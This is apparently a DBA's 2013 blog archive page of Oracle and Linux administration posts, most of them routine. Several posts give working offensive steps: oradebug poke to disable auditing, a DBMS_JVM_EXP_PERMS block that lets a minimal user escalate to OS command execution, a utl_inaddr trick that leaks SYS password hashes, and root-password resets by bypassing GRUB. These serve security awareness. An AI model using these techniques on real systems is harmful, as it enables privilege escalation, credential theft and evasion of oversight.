Posts

Showing posts from April, 2013

Start/Stop Oracle Enterprise Manager 12c

To Start enterprise manager 12c you need to follow the below steps :

export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1
export OMS_HOME=/u03/app/oracle/Middleware/om12c/oms/
export AGENT_HOME=/u03/app/oracle/Middleware/agent12c/agent_inst/

ensure database and listener is runningRun the below command from $OMS_HOME emctl start oms
Run the below command from $AGENT_HOME emctl start agent 
to Stop all the services you need to do the below :

 export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1
export OMS_HOME=/u03/app/oracle/Middleware/om12c/oms/
export AGENT_HOME=/u03/app/oracle/Middleware/agent12c/agent_inst/

Run the below command from $OMS_HOME emctl stop oms -all
Run the below command from $AGENT_HOME emctl stop agent 
Now you can shutdown database and listener.

Thank you
Osama mustafa




Step By Step to Install Enterprise Manager 12c on Redhat 6.1

Image
in this article you will have a look how to install Oracle Enterprise manager 12c ( em12c ) on Redhat 6 update 1 Operating system.

First Step is select supported OS and Database to install repository. and you can check about certification and to do that :


1.Log in to My Oracle Support, which is accessible at the following URL: https://support.oracle.com
2. Click the Certifications tab.
3. In the Certification Search region, select Enterprise Manager Cloud Control from the Product list.
4. From the Release list, select 12.1.0.2.0, then click Search.
5. Expand the Databases node.


after checking the certification you need to install the following :
Enterprise manager 12c from here.Redhat 6 from hereif you install on Linux 64bit you need to apply Patch 10404530 Download from here. Enterprise manager needs the following Requirement :
Hardware Minimum: 6 GB of RAM. Disk Space Requirements 30Gb to 50Gb for installation of the software.
Software
OMS Package

make-3.81
binutils-2.17.50.0.6
gcc -4.1.…

Add New Mount On Linux ( Redhat 6)

Sometime you need to add new mount to Linux after creation the following article will describe how to do this , all the steps tested on Redhat 6.1 , after add disk


[root@localhost Desktop]# fdisk -l
Disk /dev/sda: 85.9 GB, 85899345920 bytes
255 heads, 63 sectors/track, 10443 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000be2c2
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         262     2097152   83  Linux
Partition 1 does not end on cylinder boundary.
/dev/sda2             262        2220    15728640   83  Linux
/dev/sda3            2220        3525    10485760   83  Linux
/dev/sda4            3525        7833    34601984    5  Extended
/dev/sda5            3525        4831    10485760   83  Linux
/dev/sda6            4831        5484     5242880   82  Linux swap / Solaris
/dev/sda7            5484        5745     2097…

ORA-00838: Specified value of MEMORY_TARGET is too small,

SQL> startup
ORA-00838: Specified value of MEMORY_TARGET is too small, needs to be at least 3072M

make your calculation 3072*1024*1024 = 3221225472

SQL > create pfile='/u02/backup.init' from spfile;

edit file and put the above number in memory_target.

SQL > Create spfile from pfile='/u02/backup.init' ;

SQL > Startup ;


Thank you
Osama mustafa

SQL92_SECURITY Parameter

SQL> show parameter sql92_

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
sql92_security                       boolean     FALSE SQL92_Security seems it's parameter related to Security But what is it ? what is the benefits of using this parameter ?

I will describe this example since it will be understandable :)

SQL> create user test1 identified by test1 ;

User created.

SQL> grant create session , Create table to test1 ;

Grant succeeded.

SQL>
SQL>
SQL> create user test2 identified by test2 ;

User created.  SQL> create user test3 identified by test3 ;

User created.

SQL> grant create session to test3 ;

Grant succeeded. SQL> conn test1/test1 ;
Connected.
SQL> create table new ( id number(20)) ;

Table created.

SQL> BEGIN
    FOR v_LoopCounter IN 1..50 LOOP
    INSERT INTO new (id)
    VALUES (v_LoopCounter);
     END LOOP;
         END;
   / 

PL/SQL procedure suc…

Short Look for Oracle Privileges

Oracle Database Contain two type of privileges one called System and other called Objects each one grant it to use as they need, But interesting entity called Public. it's more Role than users , and every user created in database assign to Public by default unfortunately nothing can be done to change that. so we can say it's seems like User Group, so if you grant anything of privileges to public this means that everyone of users database will have this privilege ( System or Object ) So you need to becareful of you doing while dealing with public.

Public is everyone access to database .PUBLIC is an entity that can be granted any privilege and assigned any role. All database users automatically inherit all the rights assigned to PUBLIC. It’s a simple concept designed for convenience. Granting permissions to PUBLIC is easy to do, and often the easiest way to get a system working, however, the security implications of using the PUBLIC group to assign permissions are significant.P…

what is oracle inventory

While installing Oracle software new folder Directory created in ORACLE_BASE called oinventory  what is it ? and what the benefits of using this folder ? What kind of information will be stored ?

The inventory is created once you install Database or used for upgrades and patches. two kind of oracle inventory  one called central inventory per server and another one called local inventory for each ORACLE_HOME, the difference between each of them central inventory basically contains a high-level list of components installed on the server. It is updated each time components are installed or uninstalled but it does not have detailed information such as the patch level of each ORACLE_HOME. on another hand  local inventory  contains some component information included with patch-level information.

another different is The Central Inventory contains the information related to all Oracle products installed on a host. and consists of a file called inventory.xml, which lists all the Oracle …

Disable Auditing Using Oradebug

in 2011 Laszlo Toth Show some Oracle tricks to disable Auditing In Oracle Database included with SYS auditing using simple command Called oradebug, Just as note oradebug is undocumented in all oracle versions and if you have sysdba role privileges you can do a lot of things with this command :

the below is the demonstration :


sqlplus / as sysdba

SQL> — get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‘kzaflg_%’;

KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001

SQL> show parameter audit;

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000
Just as note with oradebug you Audit vault bec…

Oracle Critical Patch Updates for April 2013

The Critical Patch Update for April 2013 and The Oracle Java SE Critical Patch Update for April 2013 were released on April 16th, 2013. Oracle strongly recommends applying the patches as soon as possible. Please note that Sun products are included in this Critical Patch Update.

And you can download it for free from the below :

Oracle Technology Network Press Here
Oracle Techonolgy Network Page to Download CPU patch here
Oracle Jave SE Patch Press Here




Thank you
Osama mustafa

Oracle Security --> Where to Start ? What to do ?

When you start reading the title you start thinking of Race, Mostly you can think of that since technology going fast, But my article it's not about race it's talking about where should i look when i secure my database what should i secure ? I post another articles talking about security and how to secure your database what is the benefits of securing database ? I will try to mention the most important points to secure and protecting database specially internal users.

Database is complex, so DBA ( Database administrator ) must understand potential security impacts  and The three components Triangle which i mentioned before in "Top ten Threats to Database" For example when DBA looking for availability they ignore right configuration which cause security vulnerability and this can lead to expose confidential data. it's not about database if you have application you need to take over and start secure this application. but what can i do ? Where to start and how to …

ORA-1461 encountered when generating server alert SMG-3500

Two bug could be related to this error  Bug 6085625 and unpublished bug 6452485.

to fix the above bug you need to apply  Patch 6602742 or Patch 6602482 Depend on your case


as workaround you have to optiosn :

A. Flushing the shared pool can help remove the problem cursor from the shared pool.
B. Or set SESSION_CACHED_CURSORS = 0


Thank you
Osama mustafa

Oracle APPS DBA vs Oracle DBA

Name Different In One Thing Apps , Both Are DBA for the same corporation but before going further you need to know what the definition for both of them what APPS DBA mean and What Oracle DBA mean ?

Oracle DBA ( Database Administrator ) is the person who responsible for administration , Monitor , tuning and recover database ( Failure cases ) For Oracle Database this Person Called Oracle DBA.

Lot of Jobs and Tasks for this Person



Installing and upgrading the Oracle server and application toolsAllocating system storage and planning future storage requirements for the database systemCreating primary database storage structures (tablespaces) after application developers have designed an applicationCreating primary objects (tables, views, indexes) once application developers have designed an applicationModifying the database structure, as necessary, from information given by application developersEnrolling users and maintaining system securityEnsuring compliance with your Oracle license agr…

Describe Oracle Patches

Regarding to Oracle Documentation patch is program (set of instructions) to fix a particular problem or enhance/ add a particular feature in existing program/product/software. And There's Four kind of Oracle Patches :

One-off patches (bug fix)CPU (security patches)Upgrade patches (bug fixes)PSU (bug fixes are security patches) There's another kind called Bundle Patched for windows and exadata.
The most two kind of patch that people get little confused about them is CPU and PSU what are they ? when should i use them ?  is there any different between them ?

First Thing you need to know about them since they have different name then sure it's have different.

CPU:  security fixes each quarter rather than the cumulative database.

PSU : same as CPU  patches but include both the security fixes and priority fixes.Note Once a PSU is applied, only PSUs can be applied in future quarters until the database is upgraded to a new base version.
Which mean you can't Apply CPU and PSU …

DBMS_JVM_EXP_PERMS OS Command Execution / Hack Oracle

DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield, Also you need to know this way of hacking it's only works on Windows and Oracle database version infected 10gR2,11gR1  and 11gR2.

The below demonstration explain how to use it :

SQL> CONNECT / AS SYSDBA
Connected.
SQL> CREATE USER Test IDENTIFIED BY Test;

User created.

SQL> GRANT CREATE SESSION TO Test;

Grant succeeded.

SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 'TEST';

no rows selected

SQL> CONNECT Test/test
Connected.

SQL> DECLARE
   POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
   CURSOR C1 IS SELECT
'GRANT','GREMLIN','SYS','java.io.FilePermission','<FILES>>','execute','ENABLED' FROM DUAL; 
  BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  END;…

Hack Sys Password With Simple Way

Sometimes you want to know the SYS password with simplest way, well check the below if you have any User with DBA role then you can do that :

SQL>  select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual;
 select utl_inaddr.get_host_name((
        *
ERROR at line 1:
ORA-29257: host SYS=8A8F025737A9097Aunknown
ORA-06512: at "SYS.UTL_INADDR", line 4
ORA-06512: at "SYS.UTL_INADDR", line 35
ORA-06512: at line 1 Now You can use any Software or Online Site to Hack This Password

Thank you
Osama Mustafa

Basic Database Securiy GuideLines

Implementing any Database Security is not easy process which it's Complex since the security has to be looked at OS Layer, Database, Network , application code, and backup lot of things you need to check if you need secure database you can't ignore one part of this components.

You need to know even experts/Guru dose not have complete understanding for this list, maybe they have knowledge about it but not that much, But the most important things in securing database ( new one ) or securing application is early understanding security model very early in the development process  and how to develop it. you can read the this book  "Oracle security: Step-by-step" by Pete Finnigan he mentioned lot of basic steps to secure oracle database.


From a high level perspective, security is always about risk. If you think that your system is impenetrable, think again. Someone else will always be building a better mousetrap.

For example if we asked ourself as DBA About SQL injection o…

ORA-0131: insufficient privileges/could not validate ASMSNMP password

This error related to ASM instance, Usually it's happened when you are trying to create dbconsole the solution is simple and not that complicated just follow the below instruction.


Choose one of Rac ( Real Application Cluster ) and fire the below command under grid user :

 orapwd file=/u01/app/11.2.0/grid/dbs/orapw+ASM password=

Now Move the  (orapw+ASM) to other nodes using scp and any FTP software as you like. to know about scp here. check the below example :

scp orapw+ASM :/u01/app/11.2.0/grid/dbs/

Back to Oracle User :

export ORACLE_SID=+ASM1
export ORACLE_HOME=/u01/app/11.2.0/grid
$ sqlplus / as sysasm
SQL>create user asmsnmp identified by ;
SQL> grant sysdba to asmsnmp;
Thank you
Osama Mustafa

Hack Root Password With Protected Grub

Image
I post before Article talking about "Hack Root Password With Protected Grub" Here .

But what if GRUB was Locked By password and you forget Root Password, There's always away to do it but you need the same media for Operating system ( Never tried to use different distribution ) after boot :






In the above screen Type " linux rescue " and then Press enter

After follow the instruction and Enter Bash

chroot /mnt/sysimage [Enter]
cd /boot/grub [Enter]
vi menu.lst

Now In that file you see word "Password"  Remove Line, This will remove Grub password after save it the OS will Reboot but this time Grub will be UN-Protected , Remove CD and follow the normal instruction in Article Number one Here.

Thank you
Osama Mustafa


rdesktop: A Remote Desktop Protocol Client

Image
rdesktop is an open source client for Windows Remote Desktop Services, capable of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop. rdesktop is known to work with Windows versions such as NT 4 Terminal Server, 2000, XP, 2003, 2003 R2, Vista, 2008, 7, and 2008 R2. Click Here.


You can install the package using yum like the below :
# rpm -qa rdesktop
Regarding to website to connect Windows from linux you need to use -u which indicate for username follows with hostname to be like this
# rdesktop -u Administrator osama
Osama : hostname
Administrator : Username






Useful !!!


Thank you
Osama mustafa

Reset/Hack Linux Root Password ( Unprocted GRUB )

Image
Do you want to learn something New ? Hack/Reset Root Linux Password Then Continue Reading.

Root is the user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.

What If I Forget Root Password? Check The below

Restart The Server and you must see this screen Pause it click arrow :





Second Press "a" then add "1" like the below screen after finish Press enter :



Now Black Screen :




Print "Runlevel"




and Reset Root Password like the below by type "passwd" command :



Note : This Way works with Redhat , Fedora and CentOs i didn't try it on Ubuntu

Thank you
Osama mustafa







Oracle Database vs Sql Server Security

Which one is the more secure ?

the above question asked before and will be asked today and in the future but what is the answer !! Before start asnwering this question you need to discuss somepoints.

as introduction Sql server is database solution product from Microsoft corporation with the following Version list :

SQL Server 2012SQL Server 2008 R2SQL Server 2008SQL Server 2005SQL Server 2000SQL Server 7.0  On the other hand we have oracle Database which RDMS ( Relation Database Managment System ) with the following version list : Oracle7 Oracle8 Database Oracle8i Database Oracle9i Database Oracle Database 10g Oracle Database 11g each of database include new features, this features could be related to high availability, database features and secuirty features, I try to be fair in my judgment, Let's Back to Question Which is More Secure Oracle Database vs Microsoft Sql Server ? and why ?
I read lot of research regarding to this question and most of them caliming that sql server …

Sys Password and Alter User Privileges

While I am browsing i found this topic which is really amazing and Useful if you are interested securing your database, I mentioned before in my topics to secure database you need to start with simple steps first the below is one of them :
SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent=’ALTER’ and ora_dict_obj_type = ‘USER’ and
(ora_dict_obj_name = ‘SYSTEM’ or ora_dict_obj_name = ‘SYS’)
THEN
RAISE_APPLICATION_ERROR(-20003,
‘You are not allowed to alter SYSTEM/SYS user.’);
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by new_password;
alter user system identified by new_password
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by new_password;
alter user sys identified by new_password
*
ERROR at line 1:
ORA-00604: error occurred a…